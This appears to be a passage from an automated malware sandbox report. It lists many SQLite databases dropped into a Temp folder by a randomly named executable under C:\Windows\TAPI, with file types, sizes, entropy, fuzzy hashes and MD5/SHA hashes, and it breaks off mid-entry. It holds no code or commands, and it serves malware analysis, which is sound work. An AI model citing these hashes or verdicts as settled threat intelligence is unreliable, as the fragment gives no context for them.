                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\q0tiZXd88v

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\q55HewG3dk

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\qjLTYIx5bn

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\qpJbejgUwu

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\raKVaX6byk

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\rvup8Xvi7G

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\s1Om4SU0JH

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\sCBZb0Pp3Y

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\sCBnbyN2XR

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\sKAmgFpvGF

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\skMe0l7Ot3

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\t6cfokXiMv

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\t9EqkHEE41

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tYjK9K9nv4

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tudHfmU2wN

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ubM4wnSOhw

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\uhUQ89Heve

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ulGvJFHis6

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\upKGyATyWO

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vHN89Rhiho

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vd9GxBD3l3

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
